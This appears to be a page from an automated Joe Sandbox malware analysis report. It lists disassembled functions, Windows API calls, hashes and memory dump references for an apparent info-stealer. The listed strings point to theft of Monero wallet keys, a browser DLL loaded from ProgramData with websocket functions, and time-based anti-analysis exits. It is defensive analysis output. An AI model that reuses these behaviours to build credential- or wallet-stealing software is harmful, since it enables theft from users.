                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: dllmain_raw$dllmain_crt_dispatch
                              • String ID:
                              • API String ID: 3136044242-0
                              • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction ID: 2a83da155c8d5e4eae7d581d8d1a59c380cd064fcfa384f8a9382be25369c7f9
                              • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction Fuzzy Hash: AD218E72D4062DABDB229E65CC49ABF7F79FB81B90F055119F82977211C3308D419BA0
                              Function 004D6BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 004D6C0C
                              • sscanf.NTDLL ref: 004D6C39
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004D6C52
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 004D6C60
                              • ExitProcess.KERNEL32 ref: 004D6C7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d7b6863e085b0dc3b713d7d3d7d97654d4584f660ab1726b3a393348ffe51f30
                              • Instruction ID: 8c79b7720caead62cb82f394921994f8b4477dd22f5f2c3d3094de6c8ade3c78
                              • Opcode Fuzzy Hash: d7b6863e085b0dc3b713d7d3d7d97654d4584f660ab1726b3a393348ffe51f30
                              • Instruction Fuzzy Hash: 5B21CD75D142089BCF08EFE4E9559EEB7B9FF48300F04852FE506A3250EB349605CB69
                              Function 004D7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7FC7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7FCE
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BEF8,00000000,00020119,?), ref: 004D7FEE
                              • RegQueryValueExA.ADVAPI32(?,012ADCA0,00000000,00000000,000000FF,000000FF), ref: 004D800F
                              • RegCloseKey.ADVAPI32(?), ref: 004D8022
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: f6c3a4846187581d7b2cfce1d750ba977efae557864e4988e425a83b1c71a20b
                              • Instruction ID: f2210c7801398ea07b66cfaed02d34bbec052875e1748d74121a9a143d3989f8
                              • Opcode Fuzzy Hash: f6c3a4846187581d7b2cfce1d750ba977efae557864e4988e425a83b1c71a20b
                              • Instruction Fuzzy Hash: 7B118CB1A94209ABD704CF84DD45FBBBBB8FB44B10F10821BF615A7280D7B95801CBA5
                              Function 004D93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(012AE2F0,00000000,00000000,?,004C9F71,00000000,012AE2F0,00000000), ref: 004D93FC
                              • lstrcpyn.KERNEL32(00797580,012AE2F0,012AE2F0,?,004C9F71,00000000,012AE2F0), ref: 004D9420
                              • lstrlen.KERNEL32(00000000,?,004C9F71,00000000,012AE2F0), ref: 004D9437
                              • wsprintfA.USER32 ref: 004D9457
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 0d502a6bdda36ae6ac16f277c09dbaec704e9602327f49d97e64db59400ec462
                              • Instruction ID: d5f897dfed82ed22f9cebc687f911e9fce63a99848e7b749fe5c6183bc8edad5
                              • Opcode Fuzzy Hash: 0d502a6bdda36ae6ac16f277c09dbaec704e9602327f49d97e64db59400ec462
                              • Instruction Fuzzy Hash: 27011E75518108FFCB08DFA8D954EEE7B78EB48304F108249F9099B301D639AA51DB94
                              Function 004C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004C12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004C12F5
                              • RegCloseKey.ADVAPI32(?), ref: 004C12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: c143153104d0ddc06ff00ea7a098ec6228b2719c53277a605d981ddb7c2d6f0e
                              • Instruction ID: b911507fad652a58c295ebd77ffb1bf971035ed8544e39e2c240da7986d1f8dd
                              • Opcode Fuzzy Hash: c143153104d0ddc06ff00ea7a098ec6228b2719c53277a605d981ddb7c2d6f0e
                              • Instruction Fuzzy Hash: EA01E179A54209BFDB04DFD4DC49FAE7778FB48701F10819AFA0597290D7749A01CB94
                              Function 004D68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004D6903
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D69C6
                              • ExitProcess.KERNEL32 ref: 004D69F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: ce677712a0678338b2cc3ac9a052d063d25e5b602c9aeca27ac484bcc90a55ce
                              • Instruction ID: 5803fc7295001bdfb6132c78ca9f6b28a75eab481050b06be97de35025f54d8d
                              • Opcode Fuzzy Hash: ce677712a0678338b2cc3ac9a052d063d25e5b602c9aeca27ac484bcc90a55ce
                              • Instruction Fuzzy Hash: 133118B1901218ABDB14EB91DCA6BDDB778AF44304F40418FF20566291DB786B49CF69
                              Function 004D8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,004E0E10,00000000,?), ref: 004D89BF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D89C6
                              • wsprintfA.USER32 ref: 004D89E0
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: e276ac079ffc307673fef1989f1950339a643c7beccf8c26eee5163a8992f612
                              • Instruction ID: 8557761c9acb04616322c9f74a62f43d65f9be3c40d2b40d49a5f08cd1d22f43
                              • Opcode Fuzzy Hash: e276ac079ffc307673fef1989f1950339a643c7beccf8c26eee5163a8992f612
                              • Instruction Fuzzy Hash: EE2160B1A54208AFDB04DFD4DD45FAEBBB8FB48700F10811AF615A7380C779A901CBA8
                              Function 004CA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004CA098
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                              • API String ID: 1029625771-1545816527
                              • Opcode ID: ee6bfdd84edac404a16a081601a2f6305a2cac0352e169d867a2b1b7ee1ac530
                              • Instruction ID: fd85fde5ea2700a783ab6ed70c98c5e1661dc5feb298a5f09f44c319de36039a
                              • Opcode Fuzzy Hash: ee6bfdd84edac404a16a081601a2f6305a2cac0352e169d867a2b1b7ee1ac530
                              • Instruction Fuzzy Hash: 65F090746AC208AFD70CAB69EC4DF663394E305305F50841BE105932A0CB7C489ACB2E
                              Function 004D8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004D96AE,00000000), ref: 004D8EEB
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D8EF2
                              • wsprintfW.USER32 ref: 004D8F08
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 776a176d33f77d4dbea931e274ad8ae5da04822532149691574c2f63735a6dc7
                              • Instruction ID: 834604326183dff8e516506088bd5025531dc0b1d731a68697157128bdca375b
                              • Opcode Fuzzy Hash: 776a176d33f77d4dbea931e274ad8ae5da04822532149691574c2f63735a6dc7
                              • Instruction Fuzzy Hash: 94E08C74A68308BBDB04DB94DD0AE6D77B8FB04302F008096FD0987340DA759E00CB99
                              Function 004CA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CAA11
                              • lstrlen.KERNEL32(00000000,00000000), ref: 004CAB2F
                              • lstrlen.KERNEL32(00000000), ref: 004CADEC
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • DeleteFileA.KERNEL32(00000000), ref: 004CAE73
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 762c61fab260f71ef29c4c556e5b98e82d702a4ef6ee199917b5e0ecea8b261f
                              • Instruction ID: daa5b4c8c8f85bed815f27e3e86fd8e1aa4ee3cdd877a123509e0e938e986f72
